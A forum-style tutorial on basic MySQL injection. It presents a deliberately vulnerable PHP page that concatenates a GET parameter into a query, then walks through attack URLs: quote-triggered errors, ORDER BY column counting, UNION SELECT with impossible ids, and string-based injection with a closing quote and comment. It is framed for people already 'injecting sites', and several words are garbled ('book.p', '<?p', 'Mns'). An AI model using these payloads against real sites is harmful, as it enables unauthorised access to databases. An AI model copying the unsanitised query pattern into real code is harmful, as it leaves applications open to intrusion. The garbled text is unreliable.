SQL Injection behind the Scene

Well Many people are injecting site with sql injection but most of them dont know what is going on behind it . so i have made this small tutorial for them . This is just basic scene behind mysql injection .
Lets take server has index.html with following portion:
<htlml>
<body>
<a href="book.p?id=1">book</a>
</body>
</html>

Lets take server has another file named book.p that contains following p .

<?p
// Make a MySQL Connection
$con = mysql_connect("localhost","user","pass");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db("my_db", $con);
$id=$_GET['id'];
$result = mysql_query("SELECT id,name,price FROM book WHERE id=$id");
$row=mysql_fetch_rows($result);
echo "Name:".$row['name'];
echo "Price:".$row['price'];
?>


table book looks like this :
[: 454545u.jpg]

Now we click on book we get through this link .

:
www.site.com/book.p?id=1
and we get output
:
name=sql price=15

so when you inject with '
:
www.site.com/book.p?id=1'

so following query will be sent to serve

:
SELECT id,name,price FROM book WHERE id=1'
server interpret special character ' , / , \ , * as incorrect syntax and we get mysql error .
:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use nr ''' at line 1.

Counting no of Columns :

:
www.site.com/book.p?id=1 order by 1--
So following query will be sent to server
:
SELECT id,name,price FROM book WHERE id=1 order by 1
Mns order by first(id) column

:
www.site.com/book.p?id=1 order by 2--
So following query will be sent to server
:
SELECT id,name,price FROM book WHERE id=1 order by 2
Mns order by second(name) column

:
www.site.com/book.p?id=1 order by 3--
So following query will be sent to server
:
SELECT id,name,price FROM book WHERE id=1 order by 3
Mns to order by third(price) column

:
www.site.com/book.p?id=1 order by 4--
So following query will be sent to server
:
SELECT id,name,price FROM book WHERE id=1 order by 4
Mns to order by fourth column which does not exist .so we will get error

:
Unknown column '4' in 'order clause'

Union select part :

:
www.site.com/book.p?id=1 UnioN seLect 1,2,3--
Following query will be sent to server
:
SELECT id,name,price FROM book WHERE id=1 UnioN select 1,2,3

-- is used to ignore rest of query .

Here output will be combination of first and second injected query.It is necessary to make sure that first query returns no records and we get output of our second injected query.it is sy.we can do it in many way like
:
www.site.com/book.p?id= UnioN seLect 1,2,3--

Now server goes through the book table , looking for a row where id is set to .Since it will not find a row where is set to no records will ne returned.The Only record that will be returned will be from our injected query .

Tip: All you have to do is specify a value that does not occur in the table.
:
www.site.com/book.p?id=xyz UnioN seLect 1,2,3--
www.site.com/book.p?id=-1 UnioN seLect 1,2,3--
www.site.com/book.p?id=1 div 0 UnioN seLect 1,2,3--
Just put something that looks out of the ordinary as best you can tell by looking at the legitimate values.
When a is expected, zero and negative s often work well. For a text argument,simply use a string such as "NoSuchRecord", "NotInTable", or the ever-popular "sjdhalksjhdlka". Just as long as it won't return records.

we get 2 and 3 on screen .

Why we see this vulnerable on screen ?

Basically 2 and 3 is column name .
In source file there is echo statement which is displaying those rows of those columns which we are seeing on screen . Look above p source file and see
:
echo "Name:".$row['name'];
echo "Price:".$row['price'];

Thats why we get
:
Name:2 Price:3

Difference between integer and string based injection :

Lets take is :
P :
$id=$_GET['id'];$result = mysql_query("SELECT id,name,price FROM book WHERE id=$id");

here id=value
so whatever we write directly will be accepted to id .

Now look foolowing
P :
$id=$_GET['id'];$result = mysql_query("SELECT id,name,price FROM book WHERE id='$id'");

here id='value'
so to complete first ' we have to add another ' after value

:
www.site.com/book.p?id=1' order by 1-- -

will become
:
SELECT id,name,price FROM book WHERE id='1' order by 1-- -